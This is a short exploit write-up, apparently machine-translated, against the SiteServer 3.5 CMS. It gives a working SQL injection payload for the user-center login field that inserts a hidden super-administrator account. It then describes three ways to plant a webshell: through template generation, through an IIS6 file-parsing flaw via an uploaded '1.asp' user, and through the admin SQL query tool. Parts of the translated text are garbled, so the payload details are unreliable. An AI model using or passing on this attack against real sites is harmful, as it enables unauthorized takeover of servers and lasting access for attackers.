Tested to flash the latest version of stieserver 3.5 Official Website: www.siteserver.cn EXP: directly access UserCenter/login. aspx UserName field: 123 'insert into rong_administrator ([UserName], [Password], [PasswordFormat], [PasswordSalt]) values ('Blue ', 'vffsuzcbpo4 = ', 'encrypted', 'privacy = '); insert into rong_administratorsinroles values ('admin', 'Blue'); insert into rong_administratorsinroles values ('registereduser', 'Blue '); insert in To export rong_administratorsinroles values ('consoleadmin', 'blue'); -- the password is empty. Enter the verification code and submit it. you can insert a Super User with the blue username and lanhai password into the database. Then access the background SiteServer/login. aspx uses the inserted user to log on to the background and use webshell in three ways: 1. Site Management-> display function-> template management-> Add a single page template-> Generate aspx 2. Member permissions-> Add User-> Username: 1.asp http://127.0.0.1/usercenter/ Www.2cto.com: 1. asp logs in, uploads the profile picture, and uses the IIS6 parsing vulnerability to obtain the webshell (ps: when adding users in the background, it does not verify whether it contains illegal characters) iii. System Tools-> utility-> machine parameters view the database type and name, WEB path system tools-> database tools-> SQL statement query, directly equivalent to a query analyzer, which has any Echo, you can back up webshell, or use sqlserver to directly XXOO